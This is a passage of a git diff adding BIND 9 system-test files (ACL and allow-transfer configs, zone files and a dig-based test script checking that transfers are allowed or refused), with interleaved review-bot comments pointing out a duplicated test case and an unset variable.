@@ -0,0 +1,73 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +acl rejectkeys { + !key one; !key two; any; +}; + +acl rejectaddrs { + !10.53.0.1; !10.53.0.2; any; +}; + +acl check1 { !key one; 10.53.0.1; }; + +acl check2 { !key two; 10.53.0.2; }; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tsigzone" { + type primary; + file "tsigzone.db"; + allow-transfer { !rejectkeys; !rejectaddrs; !check1; !check2; any; }; +}; diff --git a/bin/tests/system/acl/ns2/named5.conf.in b/bin/tests/system/acl/ns2/named5.conf.in new file mode 100644 index 0000000..f43f33c --- /dev/null +++ b/bin/tests/system/acl/ns2/named5.conf.in 
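Review bot: The `allow-transfer { !rejectkeys; !rejectaddrs; !check1; !check2; any; };` line in acl/ns2/named4.conf.in carries no comment, and a chain of negated nested ACLs that themselves contain negated elements is hard to read correctly from the config alone. tests.sh states the intent as "we only allow 10.53.0.1 *and* key one, or 10.53.0.2 *and* key two"; putting that sentence in a `/* ... */` comment above the line, as named2.conf.in does for its `0a00::/8` case, would let a reader check the ACL against its purpose. A short remark on each of `check1` and `check2` saying which address/key pairing it guards would help in the same way.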
@@ -0,0 +1,63 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; + allow-query-on { 10.53.0.2; }; + blackhole { 10.53.0.8; }; +}; + +key one { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +key two { + algorithm hmac-md5; + secret "1234abcd8765"; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "tsigzone" { + type primary; + file "tsigzone.db"; + allow-transfer { !key one; any; }; +}; diff --git a/bin/tests/system/acl/ns3/example.db b/bin/tests/system/acl/ns3/example.db new file mode 100644 index 0000000..34fe9e5 --- /dev/null +++ b/bin/tests/system/acl/ns3/example.db 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 diff --git a/bin/tests/system/acl/ns3/named.conf.in b/bin/tests/system/acl/ns3/named.conf.in new file mode 100644 index 0000000..fceed38 --- /dev/null +++ b/bin/tests/system/acl/ns3/named.conf.in @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify no; + allow-new-zones yes; + allow-transfer { none; }; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; diff --git a/bin/tests/system/acl/ns4/example.db b/bin/tests/system/acl/ns4/example.db new file mode 100644 index 0000000..91c8702 --- /dev/null +++ b/bin/tests/system/acl/ns4/example.db 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.4 diff --git a/bin/tests/system/acl/ns4/existing.db b/bin/tests/system/acl/ns4/existing.db new file mode 100644 index 0000000..91c8702 --- /dev/null +++ b/bin/tests/system/acl/ns4/existing.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.4 diff --git a/bin/tests/system/acl/ns4/named.conf.in b/bin/tests/system/acl/ns4/named.conf.in new file mode 100644 index 0000000..6389c33 --- /dev/null +++ b/bin/tests/system/acl/ns4/named.conf.in 
@@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + notify no; + allow-new-zones yes; + allow-transfer { none; }; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +zone "existing" { + type primary; + file "existing.db"; +}; diff --git a/bin/tests/system/acl/setup.sh b/bin/tests/system/acl/setup.sh new file mode 100644 index 0000000..2f2db71 --- /dev/null +++ b/bin/tests/system/acl/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh +$SHELL ../genzone.sh 2 3 >ns2/example.db +$SHELL ../genzone.sh 2 3 >ns2/tsigzone.db +copy_setports ns2/named1.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf diff --git a/bin/tests/system/acl/tests.sh b/bin/tests/system/acl/tests.sh new file mode 100644 index 0000000..19e5c8f 
--- /dev/null
+++ b/bin/tests/system/acl/tests.sh
@@ -0,0 +1,228 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +t=0 + +echo_i "testing basic ACL processing" +# key "one" should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + + +# any other key should be fine +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +copy_setports ns2/named2.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 +sleep 5 + +# prefix 10/8 should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +# any other address should work, as long as it sends key "one" +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 127.0.0.1 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. 
\ + @10.53.0.2 -b 127.0.0.1 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +echo_i "testing nested ACL processing" +# all combinations of 10.53.0.{1|2} with key {one|two}, should succeed +copy_setports ns2/named3.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 +sleep 5 + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.2 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.2 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# but only one or the other should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 127.0.0.1 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.2 axfr > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $tt failed" ; status=1; } + +# and other values? right out +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. 
\ + @10.53.0.2 -b 127.0.0.1 axfr -y "${DEFAULT_HMAC}:three:1234abcd8765" > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +# now we only allow 10.53.0.1 *and* key one, or 10.53.0.2 *and* key two +copy_setports ns2/named4.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 +sleep 5 + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.2 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# should succeed +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 && { echo_i "test $t failed" ; status=1; } + +# should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.2 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +# should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.1 axfr -y two:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +# should fail +t=`expr $t + 1` +$DIG $DIGOPTS tsigzone. \ + @10.53.0.2 -b 10.53.0.3 axfr -y one:1234abcd8765 > dig.out.${t} +grep "^;" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +echo_i "testing allow-query-on ACL processing" +copy_setports ns2/named5.conf.in ns2/named.conf +rndc_reload ns2 10.53.0.2 +sleep 5 +t=`expr $t + 1` +$DIG -p ${PORT} +tcp soa example. \ + @10.53.0.2 -b 10.53.0.3 > dig.out.${t} +grep "status: NOERROR" dig.out.${t} > /dev/null 2>&1 || { echo_i "test $t failed" ; status=1; } + +echo_i "testing blackhole ACL processing" +t=`expr $t + 1` +ret=0 +$DIG -p ${PORT} +tcp soa example. \ + @10.53.0.2 -b 10.53.0.3 > dig.out.1.${t} +grep "status: NOERROR" dig.out.1.${t} > /dev/null 2>&1 || ret=1 +$DIG -p ${PORT} +tcp soa example. 
\ + @10.53.0.2 -b 10.53.0.8 > dig.out.2.${t} +grep "status: NOERROR" dig.out.2.${t} > /dev/null 2>&1 && ret=1 +grep "communications error" dig.out.2.${t} > /dev/null 2>&1 || ret=1 +$DIG -p ${PORT} soa example. \ + @10.53.0.2 -b 10.53.0.3 > dig.out.3.${t} +grep "status: NOERROR" dig.out.3.${t} > /dev/null 2>&1 || ret=1 +$DIG -p ${PORT} soa example. \ + @10.53.0.2 -b 10.53.0.8 > dig.out.4.${t} +grep "status: NOERROR" dig.out.4.${t} > /dev/null 2>&1 && ret=1 +grep "connection timed out" dig.out.4.${t} > /dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +# AXFR tests against ns3 + +echo_i "testing allow-transfer ACLs against ns3 (no existing zones)" + +echo_i "calling addzone example.com on ns3" +$RNDCCMD 10.53.0.3 addzone 'example.com {type primary; file "example.db"; }; ' +sleep 1 + +t=`expr $t + 1` +ret=0 +echo_i "checking AXFR of example.com from ns3 with ACL allow-transfer { none; }; (${t})" +$DIG -p ${PORT} @10.53.0.3 example.com axfr > dig.out.${t} 2>&1 +grep "Transfer failed." dig.out.${t} >/dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "calling rndc reconfig" +rndc_reconfig ns3 10.53.0.3 + +sleep 1 + +t=`expr $t + 1` +ret=0 +echo_i "re-checking AXFR of example.com from ns3 with ACL allow-transfer { none; }; (${t})" +$DIG -p ${PORT} @10.53.0.3 example.com axfr > dig.out.${t} 2>&1 +grep "Transfer failed." dig.out.${t} >/dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +# AXFR tests against ns4 + +echo_i "testing allow-transfer ACLs against ns4 (1 pre-existing zone)" + +echo_i "calling addzone example.com on ns4" +$RNDCCMD 10.53.0.4 addzone 'example.com {type primary; file "example.db"; }; ' +sleep 1 + +t=`expr $t + 1` +ret=0 +echo_i "checking AXFR of example.com from ns4 with ACL allow-transfer { none; }; (${t})" +$DIG -p ${PORT} @10.53.0.4 example.com axfr > dig.out.${t} 2>&1 +grep "Transfer failed." 
dig.out.${t} >/dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "calling rndc reconfig" +rndc_reconfig ns4 10.53.0.4 + +sleep 1 + +t=`expr $t + 1` +ret=0 +echo_i "re-checking AXFR of example.com from ns4 with ACL allow-transfer { none; }; (${t})" +$DIG -p ${PORT} @10.53.0.4 example.com axfr > dig.out.${t} 2>&1 +grep "Transfer failed." dig.out.${t} >/dev/null 2>&1 || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/additional/clean.sh b/bin/tests/system/additional/clean.sh new file mode 100644 index 0000000..c43c36e --- /dev/null +++ b/bin/tests/system/additional/clean.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after tests. +# + +rm -f dig.out.* +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/additional/ns1/mx.db b/bin/tests/system/additional/ns1/mx.db new file mode 100644 index 0000000..6305e8b --- /dev/null +++ b/bin/tests/system/additional/ns1/mx.db 
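Review bot: In acl/tests.sh the "nested ACL" block promises all four combinations of 10.53.0.{1|2} with key {one|two}, but the fourth "should succeed" case repeats `-b 10.53.0.1 axfr -y two:1234abcd8765`, so source 10.53.0.1 with key `one` is never exercised against named3.conf; the fourth call should read `@10.53.0.2 -b 10.53.0.1 axfr -y one:1234abcd8765 > dig.out.${t}`. Two cases later the failure message expands `$tt`, which is never set in the visible script, so the test number is missing from the log; it should be `echo_i "test $t failed"`. The deny-path checks in the first half accept any line starting with `;` as proof of refusal, which a dig-side error would presumably also produce. Matching `Transfer failed.`, as the ns3/ns4 checks at the end of the file already do, would tie the result to the server's answer.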
@@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 + MX 0 mail +ns1 A 10.53.0.1 +mail A 1.2.3.4 +_25._tcp.mail TLSA 3 0 1 5B30F9602297D558EB719162C225088184FAA32CA45E1ED15DE58A21 D9FCE383 diff --git a/bin/tests/system/additional/ns1/named.args b/bin/tests/system/additional/ns1/named.args new file mode 100644 index 0000000..15aa849 --- /dev/null +++ b/bin/tests/system/additional/ns1/named.args @@ -0,0 +1,2 @@ +# this server runs named with only one worker thread +-m record,size,mctx -c named.conf -d 99 -D additional-ns1 -X named.lock -g -n 1 -T maxcachesize=2097152 diff --git a/bin/tests/system/additional/ns1/named1.conf.in b/bin/tests/system/additional/ns1/named1.conf.in new file mode 100644 index 0000000..d058d1e --- /dev/null +++ b/bin/tests/system/additional/ns1/named1.conf.in 
@@ -0,0 +1,62 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + recursion no; + dnssec-validation no; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + minimal-responses yes; +}; + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "rt.example" { + type primary; + file "rt.db"; +}; + +zone "naptr.example" { + type primary; + file "naptr.db"; +}; + +zone "rt2.example" { + type primary; + file "rt2.db"; +}; + +zone "naptr2.example" { + type primary; + file "naptr2.db"; +}; + +zone "nid.example" { + type primary; + file "nid.db"; +}; diff --git a/bin/tests/system/additional/ns1/named2.conf.in b/bin/tests/system/additional/ns1/named2.conf.in new file mode 100644 index 0000000..56c6d4b --- /dev/null +++ b/bin/tests/system/additional/ns1/named2.conf.in 
@@ -0,0 +1,62 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + recursion no; + dnssec-validation no; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + minimal-responses no; +}; + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "rt.example" { + type primary; + file "rt.db"; +}; + +zone "naptr.example" { + type primary; + file "naptr.db"; +}; + +zone "rt2.example" { + type primary; + file "rt2.db"; +}; + +zone "naptr2.example" { + type primary; + file "naptr2.db"; +}; + +zone "nid.example" { + type primary; + file "nid.db"; +}; diff --git a/bin/tests/system/additional/ns1/named3.conf.in b/bin/tests/system/additional/ns1/named3.conf.in new file mode 100644 index 0000000..ad453a3 --- /dev/null +++ b/bin/tests/system/additional/ns1/named3.conf.in 
@@ -0,0 +1,63 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + recursion no; + dnssec-validation no; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + minimal-any yes; + minimal-responses no-auth; +}; + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "rt.example" { + type primary; + file "rt.db"; +}; + +zone "naptr.example" { + type primary; + file "naptr.db"; +}; + +zone "rt2.example" { + type primary; + file "rt2.db"; +}; + +zone "naptr2.example" { + type primary; + file "naptr2.db"; +}; + +zone "nid.example" { + type primary; + file "nid.db"; +}; diff --git a/bin/tests/system/additional/ns1/named4.conf.in b/bin/tests/system/additional/ns1/named4.conf.in new file mode 100644 index 0000000..69479b9 --- /dev/null +++ b/bin/tests/system/additional/ns1/named4.conf.in 
@@ -0,0 +1,72 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + recursion no; + dnssec-validation no; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + minimal-responses no-auth-recursive; +}; + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "mx.example" { + type primary; + file "mx.db"; +}; + +zone "srv.example" { + type primary; + file "srv.db"; +}; + +zone "rt.example" { + type primary; + file "rt.db"; +}; + +zone "naptr.example" { + type primary; + file "naptr.db"; +}; + +zone "rt2.example" { + type primary; + file "rt2.db"; +}; + +zone "naptr2.example" { + type primary; + file "naptr2.db"; +}; + +zone "nid.example" { + type primary; + file "nid.db"; +}; diff --git a/bin/tests/system/additional/ns1/naptr.db b/bin/tests/system/additional/ns1/naptr.db new file mode 100644 index 0000000..51d3c85 --- /dev/null +++ b/bin/tests/system/additional/ns1/naptr.db 
@@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 +ns1 A 10.53.0.1 + +nap IN NAPTR 50 50 "S" "SIPS+D2T" "" server +server SRV 0 0 5061 server +server A 192.168.2.9 +server AAAA 192::9 diff --git a/bin/tests/system/additional/ns1/naptr2.db b/bin/tests/system/additional/ns1/naptr2.db new file mode 100644 index 0000000..78ca4ad --- /dev/null +++ b/bin/tests/system/additional/ns1/naptr2.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 +ns1 A 10.53.0.1 + +nap IN NAPTR 50 50 "S" "SIPS+D2T" "" server.hang3a.zone. +www AAAA 192::99 +www A 192.168.2.99 +www X25 100099 diff --git a/bin/tests/system/additional/ns1/nid.db b/bin/tests/system/additional/ns1/nid.db new file mode 100644 index 0000000..f76b52e --- /dev/null +++ b/bin/tests/system/additional/ns1/nid.db 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 +ns1 A 10.53.0.1 + +ns1 NID 2 0:0:0:0 +ns1 L64 2 0:0:0:0 +ns1 L32 2 0.0.0.0 +nid2 NID 2 0:0:0:1 +nid2 LP 2 ns1 diff --git a/bin/tests/system/additional/ns1/root.db b/bin/tests/system/additional/ns1/root.db new file mode 100644 index 0000000..94cfdda --- /dev/null +++ b/bin/tests/system/additional/ns1/root.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. IN SOA ns2. hostmaster ( 2 8H 2H 4W 1D); +. NS ns1.rt.example. +. NS ns2.rt.example. +ns1.rt.example. A 10.53.0.1 +ns2.rt.example. A 10.53.0.2 +rt.example. NS ns1. +naptr.example. NS ns1. +rt2.example. NS 